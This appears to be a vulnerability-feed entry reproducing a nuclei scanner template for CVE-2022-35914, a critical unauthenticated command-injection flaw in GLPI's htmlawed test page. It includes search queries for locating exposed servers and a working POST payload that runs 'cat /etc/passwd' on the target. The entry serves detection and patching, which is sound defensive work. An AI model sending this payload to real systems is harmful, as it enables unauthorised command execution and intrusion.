nuclei | ProjectDiscovery | NUCLEI:CVE-2022-35914
Oct 03, 2022 - 12:12 p.m.

GLPI <=10.0.2 - Remote Command Execution

2022-10-03 12:12:47
ProjectDiscovery
github.com
Tags: cve, cve2022, glpi, rce, kev, glpi-project, htmlawed, command execution, upgrade, vendor, severity, critical

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.7 High (Confidence: High)

EPSS: 0.974 High (Percentile: 99.9%)

GLPI through 10.0.2 is susceptible to remote command execution through injection in /vendor/htmlawed/htmlawed/htmLawedTest.php, part of the htmlawed module.
id: CVE-2022-35914

info:
  name: GLPI <=10.0.2 - Remote Command Execution
  author: For3stCo1d
  severity: critical
  description: |
    GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
  remediation: |
    Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability.
  reference:
    - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914
    - https://github.com/cosad3s/CVE-2022-35914-poc
    - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35914
    - https://github.com/glpi-project/glpi/releases
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-35914
    cwe-id: CWE-74
    epss-score: 0.97399
    epss-percentile: 0.99914
    cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: glpi-project
    product: glpi
    shodan-query:
      - http.favicon.hash:"-1474875778"
      - http.title:"glpi"
    fofa-query:
      - icon_hash="-1474875778"
      - title="glpi"
    google-query: intitle:"glpi"
  tags: cve,cve2022,glpi,rce,kev,glpi-project
variables:
  cmd: "cat+/etc/passwd"

http:
  - raw:
      - |
        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: sid=foo

        sid=foo&hhook=exec&text={{cmd}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022031f4721d255682854c1f6e4bd4388e92d46d517fab31f98380587eb1a48affb80220778ad6d9444db683bd4d83ff14f1b4c8bdd98b8a158995518fb94c3fe5cc4a19:922c64590222798bb761d5b6d8e72950
